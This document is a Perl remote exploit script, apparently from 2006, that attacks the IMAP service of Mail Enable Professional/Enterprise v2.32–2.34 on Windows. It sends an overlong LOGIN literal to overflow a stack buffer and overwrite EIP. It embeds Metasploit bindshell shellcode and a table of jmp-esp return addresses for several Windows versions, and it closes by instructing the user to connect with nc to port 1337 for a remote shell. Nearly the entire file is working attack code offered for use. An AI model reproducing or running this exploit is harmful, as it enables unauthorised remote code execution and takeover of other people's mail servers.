#!/usr/bin/perl
#
# maildisable-v3.pl
#
# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Thu Nov 23 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
# Mail Enable Professional v2.33 (win32)
# Mail Enable Professional v2.34 (win32)
#
# what does this remind you off?
# Note: timing is quite critical with this!!, so change $send_delay
# if it doesn't work....
#
########
use Getopt::Std; getopts('t:n:', \%arg);
use Socket;
# metasploit win32 bindshell port 1337
my $zshell_win32_bind =
"\x33\xc9\x83\xe9\xb0".
"\x81\xc4\xd0\xfd\xff\xff".
"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
"\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
"\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
"\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
"\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
"\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
"\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
"\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
"\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
"\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
"\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
"\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
"\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
"\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
"\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
"\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
"\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
"\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
"\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
"\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
"\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
"\x4e\x33\xe4\x96\xcd\xcc\x32\x69";
# ff e4 -> jmp %esp
my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
"\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
"\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
"\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
"\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
"\xef\xbe\xad\xde" # DoS
);
&print_header;
my $target;
my $offset;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
print("only ".($#offsets+1)." targets known!!\n");
exit(1);
} else {
$offset = $offsets[$offset];
}
my $imapd_port = 143;
my $send_delay = 2;
my $NOP = 'A';
my $START_PAD = 3;
if (connect_host($target, $imapd_port)) {
print("-> * Connected\n");
send(SOCKET, "1 LOGIN {1022}\r\n", 0);
sleep(2);
print("-> * Sending padding payload\n");
# first recv < 0x3fe, NULL tricks strncpy...
send(SOCKET, "\x00".($NOP x 1020), 0);
sleep($send_delay);
print("-> * Sending payload\n");
$buf = ($NOP x $START_PAD).# padding
"\xee\xaf\xdc\xba". # dummy var_0
"\xef\xbe\xad\xde". # EBP
$offset. # EIP
"\xdc\xa3\x19\x03". # dummy arg_0 "\xdc\xa3\x19\x03" v2.33
($NOP x 4). # NOPS
$zshell_win32_bind. # hellcode
$NOP x (0x3fd-$START_PAD-16-length($zshell_win32_bind)-5);
send(SOCKET, $buf, 0);
sleep($send_delay);
print("-> * Successfully sent payload!\n");
print("-> * nc ".$target." 1337 for shell...\n");
}
sub print_header {
print("MailEnable Pro v2.32-4 (HOTFIX) remote exploit\n");
print("by: <mu-b\@digit-labs.org>\n\n");
}
sub usage {
print(qq(Usage: $0 -t <hostname>
-t <hostname> : hostname to test
-n <num> : return addy offset number
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
return(1338);
}
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